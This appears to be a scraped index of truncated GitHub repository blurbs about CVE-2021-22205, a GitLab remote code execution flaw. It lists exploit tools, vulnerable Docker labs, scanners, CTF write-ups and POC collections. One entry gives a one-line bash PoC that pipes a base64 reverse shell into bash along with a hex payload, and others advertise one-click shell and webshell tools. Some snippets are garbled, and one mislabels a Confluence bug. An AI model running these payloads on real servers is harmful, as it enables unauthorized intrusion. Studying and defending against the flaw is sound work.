CVE-2021-22205

CVE-2021-22205 GitLab CE/EE Preauth RCE using ExifTool This project is for learning only, if someone's rights have been violated, please contact me to remove the project, and the last DO NOT USE IT ILLEGALLY If you have any illegal behavior in the process of using this tool, you will bear all the consequences yourself All developers and all contributors of this tool do no

cve-2021-22205-hash-generator Finds an identifiable hash value for each version of GitLab vulnerable to CVE-2021-22205 (gitlabcom/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205json) Running The Tool Prerequisites This tool requires that docker be installed along with docker-compose on the machine executing the binary It also requires connection to a mongodb inst

THUCTF 2022 Writeup 本次比赛单人组队，作为一次“现场学习能力大赛”，通过网上到处学习，计解出题目 23 道， 总分 7618。以下简要按题目的分类给出本人解题的思路，附录中则辑录了使用的所有脚本 代码以及赛场上被证明是失败的一些尝试。本文的代码由 Org-mode 生成，可以在

import requests import json import time name = "repositories/gitlab/gitlab-ce" def query_gitlabce_tags(): all_tags = [] query_tag_url = "hubdockercom/v2/repositories/gitlab/gitlab-ce/tags/?page_size=100&page=1" while query_tag_url: resp = requestsget(query_tag_url) resp_json = jsonloads(resptext) tag_results = [i[&quo

GitLab-preauth-RCE_CVE-2021-22205 single line bash PoC for GitLab preauth RCE ( CVE-2021-22205 ) t="vulnsite";cmd='echo xxx_base64_of_reverse_shell_code_xxx |base64 -d|bash';f="1jpg";echo 41542654464f524d000003af444a564d4449524d0000002e81000200000046000000acffffdebf992021c8914eeb0c071fd2da88e86be6440f2c7102ee49d36e95bda2c3223f464f524d00000

Background Security is an exercise in managing risk Reviewing the common root causes of security incidents is an effective way to guide prioritized remediation efforts This repository seeks to index all publicly disclosed AWS customer security incidents with a known root cause It will exclude incidents involving exposed data stores (eg S3 bucket leaks, exposed managed or ho

CVE-2021-22205 This is the deployment for Gitlab Enterprise Edition (1395) that is vulnerable to CVE-2021-22205 using Docker container Description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 119 GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution Requirement:

CVE-2021-22205 Playground This is a small Docker recipe for setting up an instance of Gitlab Enterprise Edition (1395) that is vulnerable to CVE-2021-22205 Minimum Requirement CPU: 4 core RAM: 8GB HDD: 30GB Usage $ docker-compose up -d --build P/s: need to wait around 15-20 min for the container finish up Depends on your setup

Gitlab version index 版本号索引 主要分为 gitlab-ee (931个) 和 gitlab-ce (934个) 可以从v2接口爬取tags，大概10页 hubdockercom/v2/repositories/gitlab/gitlab-ee/tags/?page_size=100&page=1 hubdockercom/v2/repositories/gitlab/gitlab-ce/tags/?page_size=100&page=1 0x01 分析 ╭─root@u

CVE-2021-22205-getshell CVE-2021-22205-getshell

CVE-2021-22205 CVE-2021-22205 RCE

Automated-Gitlab-RCE Automated Gitlab RCE via CVE-2021-22205 examplepy GitlabURL AttackerIP Added shell via python socket and pre-loaded commands to pop an RCE Main payload used from githubcom/Al1ex/CVE-2021-22205

CVE-2021-22205 CVE-2021-22205 Exploitation of unauthenticated upload

CVE-2021-22205 基于 mr-r3bot/Gitlab-CVE-2021-22205 的Fork 简介 CVE-2021-22205: Gitlab 未授权远程代码执行漏洞 EXP 移除了对djvumake & djvulibre的依赖，直接内部生成payload，可在win平台执行。 使用方法 # 需要授权 python3 exploitpy -u <username> -p <password> -t <gitlab_url> -c <

CVE-2021-22205

Polaris 项目简介 这是一款集信息收集、漏洞利用、漏洞爆破等功能的一体化渗透测试框架 使用帮助 修改配置文件 conf/settingtoml 配置文件里配置了程序运行的必要参数以及插件的参数, 按需修改即可 安装支持类库 pip3 install -r requirementstxt -i pypidouba

Xiaoli-Tools Some scripts which I think are useful Table of content Overview Overview wmi-PS (wmi password spraying) gitlab-RCE (CVE-2021-22205)

CVE-2021-22205 CVE-2021-22205 Exploit

GitLab-CVE-2021-22205-scanner Usage $~ python3 GitLab-revshellpy -u gitlabtargetcom -l [AttackerIP] -p [AttackerPort] Credit hackeronecom/reports/1154542 Referred code snippet from here: githubcom/CsEnox/Gitlab-Exiftool-RCE/blob/main/exploitpy Disclaimer: The script is for security analysis and research onl

POC-bomber POC bomber 是一款漏洞检测工具，旨在利用大量POC快速发现目标脆弱性，节省人工检测漏洞的时间 本项目收集互联网已知危害性大的漏洞POC并集成在 POC bomber 武器库中，利用大量POC对单个或多个目标进行模糊测试，以此快速获取目标服务器权限，适合红蓝对抗或hvv中红队快速找到突

HS-CTF-22 Helt Sikker CTF 2022 Challenges Web Vaccine - SQLi Girl Scouts - Cookie modification Bradley Urglar's API - Insecure direct object reference (from NAV IT) Repo - CVE-2021-22205 gitlab RCE Protectr - robotstxt Inspector Gadget - Flag in page source Crypto Long lost message - Playfair cipher Hexadecimal - Hex to ASCII Exclusive Or - XOR with known key Mario 64

cve-hash-generator Finds an identifiable hash value for each version of GitLab vulnerable to a specific CVE by the defined semantic version range Example: gitlabcom/gitlab-org/cves/-/blob/9e9a08f61709c8016039468c90e1880715d173e7/2021/CVE-2021-22205json#L19-29 Running The Tool Prerequisites This tool requires that docker be installed along with docker-compose on the

CVE-2021-22205 Pocsuite3 For CVE-2021-22205

CVE-2021-22205 Gitlab RCE 未授权远程代码执行漏洞

CVE-2021-22205 Playground This is a small Docker recipe for setting up an instance of Gitlab Enterprise Edition (1395) that is vulnerable to CVE-2021-22205 Minimum Requirement CPU: 4 core RAM: 8GB HDD: 30GB Usage $ docker-compose up -d --build P/s: need to wait around 15-20 min for the container finish up Depends on your setup

Gitlab-CVE-2021-22205 CVE-2021-22205 的多线程批量检测脚本 使用 dnslog 可配合 poc 检测 使用多线程进行检测 可自定义命令执行

CVE-2021-22205 a report for Internet and system security class

CVE-2021-22205 由于Gitlab未正确验证传递到文件解析器的图像文件从而导致命令执行。攻击者可构造恶意请求利用该漏洞在目标系统执行任意指令，最终导致Gitlab服务器被控制。由于网上大多缺少反弹shell，故修改了网上写的脚本，增加了一键getshell功能 影响版本 119 <= GitLab（CE/EE）&

CVE-2021-22205

Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 119 GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution Affected Version Gitlab CE/EE < 13103 Gitlab CE/EE < 1396 Gitlab CE/EE < 1388 Vuln Impact Soon Reference githubc

THUCTF Write-Up by 4E1A607A Mobile checkin 科学上网上Discord, 在announcements上面有flag test your nc 连上nc survey 填完问卷, base64解码 Misc 小可莉能有什么坏心思呢？ 3张图, 用图片查看器 (没有alpha channel) 打开可以识别3组, 用stegsolve (可能有alpha channel) 又识别出两组, 最后一组扔Word里面调亮度 flagmarket_level1

Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 119 GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution Vuln Product Gitlab CE/EE < 13103 Gitlab CE/EE < 1396 Gitlab CE/EE < 1388 Environment export GITLAB_HOME=/srv/gitlab sudo d

Golang-CVE-2021-22205-POC A CVE-2021-22205 Gitlab RCE POC written in Golang I've been wanting to learn Golang for a while I decided to write a POC for CVE-2021-22205 in Golang to help familiarize myself with the language Please disregard what I am assuming is horribly written code Usage: go run CVE-2021-22205go -t 127001:8080 -c "echo pizza > /tmp

pocGoby2Xray 将Goby的json格式Poc转为xray的yaml格式Poc。 Goby和Xray是深受网络安全爱好者（包括本人）使用的社区/商业化的渗透测试工具，在Nemo项目中也集成了调用Xray进行Poc扫描。pocGoby2Xray的初衷是通过“翻译”两种工具的Poc规则和语法后进行“转换”，方便统一使用Xray的调用Poc�

CVE-2021-22205 远程攻击者在未经身份验证的情况下，可构造OGNL表达式进行注入，实现在Confluence Server或Data Center上执行任意代码,修改poc，方便getshell。 影响版本 Confluence Server and Data Center >= 130 Confluence Server and Data Center < 7417 Confluence Server and Data Center < 7137 Confluence Server and

Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 119 GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution Vuln Product Gitlab CE/EE < 13103 Gitlab CE/EE < 1396 Gitlab CE/EE < 1388 Environment export GITLAB_HOME=/srv/gitlab sudo d

English | 中文简体 ObserverWard_0x727 类别 说明 作者 三米前有蕉皮 团队 0x727 未来一段时间将陆续开源工具 定位 社区化指纹库识别工具。 语言 Rust 功能 命令行，API服务Web指纹识别工具 1 源码手动安装 git clone githubcom/0x727/ObserverWard_0x727 cd ObserverWard_0x727 cargo build --target x86_

VcenterKiller 一款针对Vcenter的综合利用工具，包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22205，提供一键上传webshell，命令执行或者上传公钥使用SSH连接

FrameVul FrameVul 综合 钉钉 泛微OA 致远OA Apache APISIX Apache Druid Apache Kylin Coremail Discuz Exchange FastJson Fckeditor Flask Gitlab Jboss Jenkins Log4j MeterSphere Oracle Access Manager Outlook Shiro Spring Struts2 Thinkphp TP-Link Vmware Weblogic Zabbix 综合 主流供应商的一些攻击性漏洞汇总 2021_Hvv漏洞 2022年Java应用程序的CVE漏洞

Awesome-Exploit 【免责声明】本仓库所涉及的技术、思路和工具仅供学习，任何人不得将其用于非法用途和盈利，否则后果自行承担。 一个漏洞利用工具仓库 不定期更新 对应漏洞详情可参见： Threekiii/Awesome-POC Threekii/Vulhub-wiki Celery Airflow Celery 消息中间件命令执行 CVE-2020-11981 Celery <

最新文库为PeiQi文库在202107之后的文档或未记录的文档、常用文档 查看历史文库-PeiQi 20220106更新 JBoss 20220105更新 log4j远程代码执行 Gitlab-CVE-2021-22205 Grafana-CVE-2021-43798 Atlassian_Confluence_远程代码执行漏洞（CVE-2021-26084） Zabbix Apache_Struts Spring_Boot 快速查阅 fastjson 通过Dnslog判断是否使用fastj

pocsuite3 (268个) 更新于 2022-12-03 05:07:10 更新记录 文件名称 收录时间 CVE-2021-21975py 2022-12-03 05:07:10 CVE-2021-46422py 2022-12-03 05:07:10 D-Linkpy 2022-12-03 05:07:10 hikvision-2013-4976_web_login-bypasspy 2022-12-03 05:07:10 lanhaipy 2022-12-03 05:07:10 CVE-2022-26134py 2022-12-03 05:07:10 rce_佑友防火墙py 2022-12-03 05:07

vulwiki 热门框架/组件/服务漏洞的描述/利用/修复 框架/组件 漏洞名 研究 apache solr Apache solr velocity模板注入(CVE-2019-17558) Apache Solr远程命令执行(CVE-2017-12629) solr未授权访问 Apache solr 远程命令执行漏洞（CVE-2019-0193） solr 任意文件读取漏洞(CVE-2021-27905) fastjson fastjson1224 &radic

漏洞索引 Program List 开源产品、国外应用软件 应用列表 国产应用软件 Program List Apache APISIX Apache Druid Apache Flink Apache HTTP Server Apache JSPWiki Apache OFBiz Apache ShenYu Apache SkyWalking Apache Solr Apache Storm Apache Struts2 Atlassian Confluence Atlassian Crowd Atlassian Jira Citrix Cisco ECShop Exchange F5 BIG-IP Gitlab Grafana Harbo

Vulhub-Reproduce 【免责声明】本仓库所涉及的技术、思路和工具仅供安全技术研究，任何人不得将其用于非授权渗透测试，不得将其用于非法用途和盈利，否则后果自行承担。 Vulhub漏洞复现，不定时更新。感谢@Vulhub提供开源漏洞靶场。 0x01 项目导航 Adobe ColdFusion 反序列化漏洞 CVE-2017-3066 Ado

漏洞索引 Program List 开源产品、国外应用软件 应用列表 国产应用软件 Program List Apache APISIX Apache Druid Apache Flink Apache HTTP Server Apache JSPWiki Apache OFBiz Apache ShenYu Apache SkyWalking Apache Solr Apache Storm Apache Struts2 Atlassian Confluence Atlassian Crowd Atlassian Jira Citrix Cisco ECShop Exchange F5 BIG-IP Gitlab Grafana Harbo

漏洞索引 Program List 开源产品、国外应用软件 应用列表 国产应用软件 Program List Apache APISIX Apache Druid Apache Flink Apache HTTP Server Apache JSPWiki Apache OFBiz Apache ShenYu Apache SkyWalking Apache Solr Apache Storm Apache Struts2 Atlassian Confluence Atlassian Crowd Atlassian Jira Citrix Cisco ECShop Exchange F5 BIG-IP Gitlab Grafana Harbo

goby poc (共926个) 最近一次检查时间 2022-12-03 10:14:29 收集记录 文件名称 收录时间 H3C-IMC-dynamiccontentpropertiesxhtm-RCEjson 2022-12-03 10:13:52 Oracle-Weblogic-Server-Deserialization-RCE(CVE-2018-2628)json 2022-12-03 10:13:52 tongda-OA-file-include-getshelljson 2022-12-03 10:13:52 H3C-Next-generation-firewall-File-readjson 2022-12-03

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享，作为笔记吧，欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享，作为笔记吧，欢迎补充。 请注意所有工具是否有后门或者其他异常行为，建议均在虚拟环境操作。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集�

TOP all Top Top Top_Codeql TOP All bugbounty pentesting CVE-2022- POC Exp Things Table of Contents 2022 year top total 30 2021 year top total 30 2020 year top total 30 2019 year top total 30 2018 year top total 30 2017 year top total 30 2016 year top total 30 2015 year top total 30 2014 year top total 30 2013 year top total 30 2022 star name url des 988 CVE-2022-0847-

Table of Contents 2023 year top total 30 2022 year top total 30 2021 year top total 30 2020 year top total 30 2019 year top total 30 2018 year top total 30 2017 year top total 30 2016 year top total 30 2015 year top total 30 2014 year top total 30 2023 star updated_at name url des 304 2023-03-18T21:10:14Z Windows_LPE_AFD_CVE-2023-21768 githubcom/chompie1337/Wi

Table of Contents 2023 year top total 30 2022 year top total 30 2021 year top total 30 2020 year top total 30 2019 year top total 30 2018 year top total 30 2017 year top total 30 2016 year top total 30 2015 year top total 30 2014 year top total 30 2023 star updated_at name url des 323 2023-03-23T01:27:35Z Windows_LPE_AFD_CVE-2023-21768 githubcom/chompie1337/Wi

PoC in GitHub 2022 CVE-2022-0185 (2022-02-11) A heap-based buffer overflow flaw was found in the way the legacy_parse_param function in the Filesystem Context functionality of the Linux kernel verified the supplied parameters length An unprivileged (in case of unprivileged user namespaces enabled, otherwise needs namespaced CAP_SYS_ADMIN privilege) local user able to open a f

SecBooks 各大文库公众号文章收集，部分文库使用gitbook部署；部分公众号使用杂散文章为主。 使用插件 "hide-element", "back-to-top-button", "-lunr", "-search", "search-pro", "splitter" #目录自动生成插件(book sm) npm install -g gitbook-summ

Table of Contents 2023 year top total 30 2022 year top total 30 2021 year top total 30 2020 year top total 30 2019 year top total 30 2018 year top total 30 2017 year top total 30 2016 year top total 30 2015 year top total 30 2014 year top total 30 2013 year top total 30 2012 year top total 30 2011 year top total 30 2010 year top total 30 2009 year top total 30 2008 year top to

PoC in GitHub 2022 CVE-2022-0185 (2022-02-11) A heap-based buffer overflow flaw was found in the way the legacy_parse_param function in the Filesystem Context functionality of the Linux kernel verified the supplied parameters length An unprivileged (in case of unprivileged user namespaces enabled, otherwise needs namespaced CAP_SYS_ADMIN privilege) local user able to open a f

PoC in GitHub 2022 CVE-2022-0185 (2022-02-11) A heap-based buffer overflow flaw was found in the way the legacy_parse_param function in the Filesystem Context functionality of the Linux kernel verified the supplied parameters length An unprivileged (in case of unprivileged user namespaces enabled, otherwise needs namespaced CAP_SYS_ADMIN privilege) local user able to open a f

PoC in GitHub 2021 CVE-2021-1056 (2021-01-07) NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidiako) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure pokerfaceSad/CVE-2021-1056 CVE-2021-